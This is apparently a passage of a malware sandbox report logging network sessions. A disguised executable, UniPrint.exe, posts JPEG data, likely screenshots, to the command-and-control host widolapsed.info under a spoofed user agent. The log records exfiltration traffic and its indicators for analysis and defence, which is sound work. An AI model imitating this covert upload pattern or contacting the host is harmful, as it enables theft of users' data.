                                                                                                      2021-09-15 11:45:30 UTC470OUTData Raw: 9d ff 00 fc 2c 4b 7f 23 ec ff 00 d9 2d b3 6e cf 33 cd 1b b1 8c 67 18 eb ed 9f c6 a8 ea 7e 33 86 e7 43 b8 d2 ed ec df 6c e3 fd 6b b8 04 72 0f dd 19 f4 f5 ae 3a 8a 5c aa cd 77 77 17 2a e6 52 ec ac 14 b4 94 b4 ca 0a f6 ad 0f 5c d1 27 f0 85 9d ac 9a bd 9c 12 7d 89 60 71 2c ca ac 8c 13 69 f9 49 07 af e7 5e 2b 45 1e 60 d5 d5 99 ec d6 5f d8 56 90 cb 1f fc 24 9a 73 f9 8c a7 3e 72 0c 63 3f ed 7b d6 a4 7e 20 d0 6c 6c 4e ed 6a c6 41 12 96 3b 27 56 63 df 85 04 92 6b c1 68 a8 95 38 ca b3 ac fe 27 a5 ff 00 ad 02 9d a9 d3 54 a3 f0 a0 a2 8a 2a c0 2b d1 bc 29 e3 dd 27 45 f0 e5 ae 9d 75 6f 7a f3 43 bf 73 46 88 54 e5 d9 86 32 c3 b1 af 39 a2 80 3d 77 fe 16 8e 85 ff 00 3e 9a 8f fd fb 4f fe 2e a3 5f 89 5e 1d 59 9a 65 b0 bf 59 1c 61 98 44 80 b7 a6 7e 7e 6b c9 a8 a2 c3 b9 af e2
                                                                                                      Data Ascii: ,K#-n3g~3Clkr:\ww*R\'}`q,iI^+E`_V$s>rc?{~ llNjA;'Vckh8'T*+)'EuozCsFT29=w>O._^YeYaD~~k
                                                                                                      2021-09-15 11:45:30 UTC472OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 31 32 33 30 30 33 36 37 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2112300367--
                                                                                                      2021-09-15 11:45:31 UTC472INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:30 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=41f3c356e7ed658eda1b73e87f8d1d8e2c0a1622c4617e1c07acdd5f39691625; expires=Thu, 15-Sep-2022 11:45:30 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:31 UTC472INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      6192.168.2.34975845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:31 UTC472OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 83305
                                                                                                      Content-Type: multipart/form-data; boundary=--------1747900146
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:31 UTC472OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 34 37 39 30 30 31 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1747900146Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:31 UTC473OUTData Raw: 59 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 8d bc 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee ca 9a 10 4e 0f 72 10 20 82 3b 3c 54 aa 1e 5f ee c8 ff 2a 88 63 f3 be db 5f c5 c6 3d 26 b3 58 91 09 97 15 60 fe 43 e5 1b 64 51 4d
                                                                                                      Data Ascii: YiPS4\DB.${Owe0E_J4f,?:M2gA[DNr ;<T_*c_=&X`CdQM
                                                                                                      2021-09-15 11:45:31 UTC473OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:31 UTC489OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:31 UTC505OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:31 UTC521OUTData Raw: 6b a1 93 c5 d6 7d 4b 6d a8 5c bf de 95 bf 3a 6f 9d 23 75 72 7f 1a af 4e 5a bf 67 15 b2 25 56 9b dd 92 ee 27 a9 34 b9 a6 8a 5a 56 2d 49 b1 d4 e1 4d cd 2e 69 16 98 ec d3 81 a8 e9 e2 93 45 26 3e 94 53 45 2d 49 a2 63 a9 c2 98 0d 3b 22 91 49 8e cd 38 53 33 4b 93 52 d1 69 92 51 4d 04 d2 fd 4d 26 8a 4c 78 a5 c8 a8 f7 a0 ea c3 f3 a6 35 cc 09 d5 c1 a5 ca c3 9d 2e a5 90 7e 53 f4 ae 33 c5 1f f1 fb 17 fd 72 15 d3 1d 4a 05 c8 19 35 cc f8 94 e6 ee 13 ff 00 4c 87 f3 aa 8c 5a dc 14 d4 a5 a1 c5 d1 45 6e 5e 14 87 c2 fa 71 8e 5d 3e 37 9a 17 2f 1b da 86 9a 53 e6 b0 c8 7d 87 18 03 fb c3 a5 70 37 6b 1e ba 57 31 29 43 32 ab 05 62 03 0c 30 07 af 7a ea b5 48 2d e4 f1 44 d6 a4 d8 4b 6f 6e 66 90 5b 5b 5b 79 4c 36 21 60 8e c1 17 39 c6 38 27 bd 55 b6 57 d4 23 b4 92 e1 74 c7 8e f0 cd
                                                                                                      Data Ascii: k}Km\:o#urNZg%V'4ZV-IM.iE&>SE-Ic;"I8S3KRiQMM&Lx5.~S3rJ5LZEn^q]>7/S}p7kW1)C2b0zH-DKonf[[[yL6!`98'UW#t
                                                                                                      2021-09-15 11:45:31 UTC537OUTData Raw: 7f f1 ba 3c cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1c 8f fa 68 39 d7 f4 99 72 8a a7 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e8 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 72 3f e9 a0 e7 5f d2 65 ca 2a 9f 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a3 cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d1 c8 ff 00 a6 83 9d 7f 49 97 28 aa 7e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 23 fe 9a 0e 75 fd 26 5c a2 a9 f9 9a 9f fc fa 5a 7f e0 53 7f f1 ba 3c cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1c 8f fa 68 39 d7 f4 99 72 8a a7 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e9 92 dd df 40 11 e7 b4 b6 11 b4 88 84 a5 c3 12 37 30 5c e0 a0 cf 5f 5a 7c 8f fa 68 5c eb fa 4c bf 45 14 54 16 15 e5 7f 16 3f e4 33 65 ff 00 5c 0f f3 af 54 af 2b f8 b1 ff 00 21 9b 2f fa e0 7f 9d
                                                                                                      Data Ascii: <O}-?)h9rjiM5?tr?_e*7I(~f>n3SKOo7G#u&\ZS<O}-?)h9rjiM@70\_Z|h\LET?3e\T+!/
                                                                                                      2021-09-15 11:45:31 UTC553OUTData Raw: 76 79 9e 68 dd 8c 63 38 c7 5f 6c fe 35 47 53 f1 9c 37 3a 1d c6 97 6f 66 fb 67 1f eb 5d c0 23 90 7e e8 cf a7 ad 71 d4 52 e5 56 6b bb b8 b9 57 32 97 65 60 a5 a4 a5 a6 50 57 b5 68 7a e6 89 3f 84 2c ed 64 d5 ec e0 93 ec 4b 03 89 66 55 64 60 9b 4f ca 48 3d 7f 3a f1 5a 28 f3 06 ae ac cf 66 b2 fe c2 b4 86 58 ff 00 e1 24 d3 9f cc 65 39 f3 90 63 19 ff 00 6b de b5 23 f1 06 83 63 62 77 6b 56 32 08 94 b1 d9 3a b3 1e fc 28 24 93 5e 0b 45 44 a9 c6 55 9d 67 f1 3d 2f fd 68 14 ed 4e 9a a5 1f 85 05 14 51 56 01 5e 8d e1 4f 1e e9 3a 2f 87 2d 74 eb ab 7b d7 9a 1d fb 9a 34 42 a7 2e cc 31 96 1d 8d 79 cd 14 01 eb bf f0 b4 74 2f f9 f4 d4 7f ef da 7f f1 75 1a fc 4a f0 ea cc d3 2d 85 fa c8 e3 0c c2 24 05 bd 33 f3 f3 5e 4d 45 16 1d cd 7f 15 ea 90 6b 5e 23 bb d4 6d 52 44 86 6d 9b 44
                                                                                                      Data Ascii: vyhc8_l5GS7:ofg]#~qRVkW2e`PWhz?,dKfUd`OH=:Z(fX$e9ck#cbwkV2:($^EDUg=/hNQV^O:/-t{4B.1yt/uJ-$3^MEk^#mRDmD
                                                                                                      2021-09-15 11:45:31 UTC554OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 34 37 39 30 30 31 34 36 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1747900146--
                                                                                                      2021-09-15 11:45:32 UTC554INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:31 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=826ebcf8610b10d2ef33c9c81539d056e24545aa120e2d070e2626fbc0fffa57; expires=Thu, 15-Sep-2022 11:45:31 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:32 UTC554INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      7192.168.2.34976045.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:32 UTC554OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 83526
                                                                                                      Content-Type: multipart/form-data; boundary=--------4043093276
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:32 UTC554OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 30 34 33 30 39 33 32 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------4043093276Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:32 UTC555OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 94 bd 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:45:32 UTC555OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:32 UTC571OUTData Raw: 48 41 c3 4a dd 07 d3 d6 a9 59 5b 35 dd e4 36 ea 70 64 60 b9 f4 1d cd 77 36 fa 91 95 5a cb 44 44 8e d2 d5 31 25 d3 8c 85 c7 5c 0e e6 bb 31 15 65 05 68 6f f9 1c 38 7a 51 9b bc f6 fc ca 6b e0 64 db f3 5f b6 ef 68 f8 fe 75 91 ac 78 62 f3 4d 8c cc a4 4f 00 ea ca 30 57 ea 2a 33 e2 5d 59 6e 0b a5 e3 95 07 80 c0 72 3d c6 2b bf d3 2e c6 a3 a5 c3 72 c8 07 9a 9f 32 f6 cf 43 5c b5 2a 62 28 5a 53 77 47 55 3a 78 7a f7 8c 15 99 e5 15 9f ac ff 00 c7 a2 7f d7 41 fc 8d 74 5e 21 b0 1a 76 b1 34 08 31 19 f9 d3 e8 7b 7f 31 5c ee b3 ff 00 1e 89 ff 00 5d 07 f2 35 d9 52 4a 54 9c 97 54 71 d3 8b 8d 65 17 d1 98 b4 51 45 79 87 aa 14 51 49 40 1e f5 2c 01 fe 64 e1 bf 9d 40 32 0e 0f 51 57 0d 53 63 fb d7 ff 00 78 d7 cb d4 4b 73 d7 8b 24 53 5e 31 af 7f c8 c1 a9 7f d7 d4 bf fa 19 af 66 53
                                                                                                      Data Ascii: HAJY[56pd`w6ZDD1%\1eho8zQkd_huxbMO0W*3]Ynr=+.r2C\*b(ZSwGU:xzAt^!v41{1\]5RJTTqeQEyQI@,d@2QWScxKs$S^1fS
                                                                                                      2021-09-15 11:45:32 UTC587OUTData Raw: 49 4b 4c 4c 29 69 28 a0 05 a2 8a 28 01 68 a4 14 b4 c4 c5 a2 92 96 98 85 a2 92 8a 00 70 a5 14 94 b4 d0 98 b4 b4 94 b4 c9 0a 5a 41 4b 4c 42 d2 8a 6d 2d 34 26 2d 3a 9a 29 d4 c4 c2 96 92 96 a8 41 4a 29 29 45 02 17 34 b4 da 51 40 0b 4b 49 4b 54 48 b4 b4 94 53 42 16 8a 28 a6 03 96 9d 4d 14 a4 d3 44 b1 73 4a 29 14 66 a4 09 eb 54 90 9b 13 14 b8 a7 01 4e e2 aa c4 5c 60 14 f1 c5 14 53 26 e1 4b 49 4b 4c 42 8a 5a 6d 2d 00 14 b9 a6 d2 9a 00 5c d1 9f 4a 6d 2e 0d 00 3b 34 99 a0 0a 70 14 08 40 29 c0 50 05 3a 82 5b 0a 4a 5c 51 8a 62 0a 5a 4a 5a 04 14 e5 a6 d2 d0 03 e8 a6 d3 85 32 45 a2 92 96 81 16 74 ef f8 fe 8b eb 4f bd 3f e9 b2 ff 00 bd 4c d3 bf e3 fa 2f ad 2d d9 cd d4 9f ef 56 1f f2 f4 b7 fc 32 2a 4a 28 ad 4c 45 a2 92 96 80 0a 28 a2 81 0b 45 25 2d 20 0a 28 a2 81 05 2d
                                                                                                      Data Ascii: IKLL)i((hpZAKLBm-4&-:)AJ))E4Q@KIKTHSB(MDsJ)fTN\`S&KIKLBZm-\Jm.;4p@)P:[J\QbZJZ2EtO?L/-V2*J(LE(E%- (-
                                                                                                      2021-09-15 11:45:32 UTC603OUTData Raw: 99 4b 0c fa b4 8c 9c 53 c4 6e 78 0a 4f e1 5a 27 52 d3 e3 ff 00 57 6a 4f d6 90 eb 81 7f d5 5a c6 3e b4 7b 4a 8f 68 87 b0 a6 b7 91 51 6d 27 6e 91 9f ca ad da 69 b7 1e 68 62 87 ad 46 da ed d1 fb a1 17 e8 29 89 aa de 3c 8b 99 4e 09 ec 2a 64 ab 34 69 4d 50 8c 96 ec b9 e3 35 db 0d a8 3e 95 cb e9 ff 00 f2 11 b7 ff 00 ae 8b 5d 37 8c 49 6b 6b 42 7a 95 ae 67 4f ff 00 90 8d bf fd 74 1f ce 96 1f f8 07 5d 6f e3 1e 85 a8 a5 b9 98 34 d2 85 38 e9 54 8c da 6c 7d 5c 9a ad e2 42 45 ea e0 ff 00 0d 62 f5 ef 58 50 a1 cd 04 db 27 13 8c e4 a8 e2 a2 74 07 53 d3 d3 ee 44 4d 30 eb 91 2f fa bb 71 58 54 56 eb 0b 0e a7 23 c7 d5 e8 6c 36 bf 37 f0 46 a2 a0 7d 66 ed ba 36 3e 95 9d 45 52 c3 d3 5d 0c 9e 2e b3 ea 5b 6d 42 e5 fe f4 ad f9 d3 7c e9 1b ab 93 f8 d5 7a 72 d5 fb 38 ad 91 2a b4 de
                                                                                                      Data Ascii: KSnxOZ'RWjOZ>{JhQm'nihbF)<N*d4iMP5>]7IkkBzgOt]o48Tl}\BEbXP'tSDM0/qXTV#l67F}f6>ER].[mB|zr8*
                                                                                                      2021-09-15 11:45:32 UTC619OUTData Raw: e9 69 ff 00 81 4d ff 00 c6 e8 e4 7f d3 41 ce bf a4 cb 94 55 3f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a3 91 ff 00 4d 07 3a fe 93 2e 51 54 fc cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8e 47 fd 34 1c eb fa 4c b9 45 53 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 79 9a 9f fc fa 5a 7f e0 53 7f f1 ba 39 1f f4 d0 73 af e9 32 e5 15 4f cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d1 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e8 e4 7f d3 41 ce bf a4 cb 94 55 3f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a3 91 ff 00 4d 07 3a fe 93 2e 51 54 fc cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8e 47 fd 34 1c eb fa 4c b9 45 53 f3 35 3f f9 f4 b4 ff 00 c0
                                                                                                      Data Ascii: iMAU?3SKOo7G7M:.QTO}-?)f>nG4LES5?tyZS9s2OjiMAU?3SKOo7G7M:.QTO}-?)f>nG4LES5?
                                                                                                      2021-09-15 11:45:32 UTC634OUTData Raw: 92 d8 b0 db f6 63 24 fc 0e 71 c9 94 83 d4 67 23 1c 70 05 6e 22 2c 68 a8 8a 15 54 60 28 18 00 7a 52 d1 40 05 7c e3 5f 47 57 ce 34 d0 98 56 c5 cf 8a 35 db 8b a9 67 fe d6 bd 8b cd 76 7f 2e 2b 87 54 4c 9c e1 46 78 03 b0 ac 7a 05 30 34 e5 d7 6f a7 9e 19 ee 64 f3 e6 8a d6 4b 51 24 ac cc cc ae 1c 12 49 39 24 09 0e 3e 82 b3 28 a2 81 05 14 51 40 05 5d d3 2f be c7 31 dc 09 8d fe f6 3b 7b d5 2a 2a e1 37 09 29 47 72 67 05 38 b8 cb 63 7d ff 00 b1 e5 6f 31 8a 64 f2 79 23 f4 ac cd 4a 4b 79 6e 17 ec a0 08 d5 36 f0 b8 e7 26 a9 d1 5a d4 af ce ad ca 91 95 3a 1c 8e fc cd 85 14 51 5c e6 e1 5d 9d 8f 8d 61 8f 46 b5 d3 6e 2c a4 02 dd 40 f3 51 c1 dd 8e 3e e9 c6 3a fa d7 19 45 16 d5 4b b0 a5 1e 68 b8 be a7 7f ff 00 0b 12 df c8 fb 3f f6 4b 6c db b3 cc f3 46 ec 63 19 c6 3a fb 67 f1
                                                                                                      Data Ascii: c$qg#pn",hT`(zR@|_GW4V5gv.+TLFxz04odKQ$I9$>(Q@]/1;{**7)Grg8c}o1dy#JKyn6&Z:Q\]aFn,@Q>:EKh?KlFc:g
                                                                                                      2021-09-15 11:45:32 UTC636OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 30 34 33 30 39 33 32 37 36 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------4043093276--
                                                                                                      2021-09-15 11:45:33 UTC636INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:32 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=50121d0d7b920ecf9b06f062985a3e93f1c5decde191e6f62180cd4ffe1ce659; expires=Thu, 15-Sep-2022 11:45:33 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:33 UTC636INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      8192.168.2.34976145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:33 UTC636OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 81257
                                                                                                      Content-Type: multipart/form-data; boundary=--------4228739266
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:33 UTC637OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 32 32 38 37 33 39 32 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------4228739266Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
